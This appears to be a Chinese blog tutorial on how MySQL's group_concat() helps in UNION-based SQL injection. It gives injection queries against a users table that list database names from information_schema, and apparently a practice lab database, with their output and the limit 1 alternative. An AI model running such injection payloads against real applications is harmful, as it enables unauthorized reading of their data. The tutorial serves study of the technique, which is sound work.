SQL注入group_concat()函数

group_concat()总的来说就是将数据放在一起。

用于将SQL语句的结果拼接在一起,如果我们的查询结果多于一个就需要将这些结果拼接出来

mysql> select schema_name from information_schema.schemata;
+--------------------+
| schema_name        |
+--------------------+
| information_schema |
| challenges         |
| mysql              |
| performance_schema |
| security           |
+--------------------+
5 rows in set (0.00 sec)

mysql> select group_concat(schema_name) from information_schema.schemata;
+-----------------------------------------------------------------+
| group_concat(schema_name)                                       |
+-----------------------------------------------------------------+
| information_schema,challenges,mysql,performance_schema,security |
+-----------------------------------------------------------------+
1 row in set (0.00 sec)
好了现在我们知道了这个函数的作用。我们就来看看SQL注入的语句。 假如有下面的注入语句:
SELECT * FROM users WHERE id='50' union select 1,(select group_concat(schema_name) from information_schema.schemata),3;
SELECT * FROM users WHERE id='50' union select 1,(select schema_name from information_schema.schemata),3;

mysql> SELECT * FROM users WHERE id='50' union select 1,(select group_concat(schema_name) from information_schema.schemata),3;
+----+-----------------------------------------------------------------+----------+
| id | username                                                        | password |
+----+-----------------------------------------------------------------+----------+
|  1 | information_schema,challenges,mysql,performance_schema,security | 3        |
+----+-----------------------------------------------------------------+----------+
1 row in set (0.00 sec)

mysql> SELECT * FROM users WHERE id='50' union select 1,(select schema_name from information_schema.schemata),3;
ERROR 1242 (21000): Subquery returns more than 1 row
直接报错了,原因是子查询的结果只能有1行,大于1行就报错了。 1.可以使用limit 1 但是limit 1只能显示1行
mysql> SELECT * FROM users WHERE id='50' union select 1,(select schema_name from information_schema.schemata limit 1),3;
+----+--------------------+----------+
| id | username           | password |
+----+--------------------+----------+
|  1 | information_schema | 3        |
+----+--------------------+----------+
1 row in set (0.00 sec)
2.使用group_concat,把查询的数据整理成一行。
mysql> SELECT * FROM users WHERE id='50' union select 1,(select group_concat(schema_name) from information_schema.schemata),3;
+----+-----------------------------------------------------------------+----------+
| id | username                                                        | password |
+----+-----------------------------------------------------------------+----------+
|  1 | information_schema,challenges,mysql,performance_schema,security | 3        |
+----+-----------------------------------------------------------------+----------+
1 row in set (0.00 sec)
所以如果我们不需要limit和group_concat进行查询多列数据,数据库会直接报错。 只有当数据是一列的时候才不需要使用他们。 大概就这些......
点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注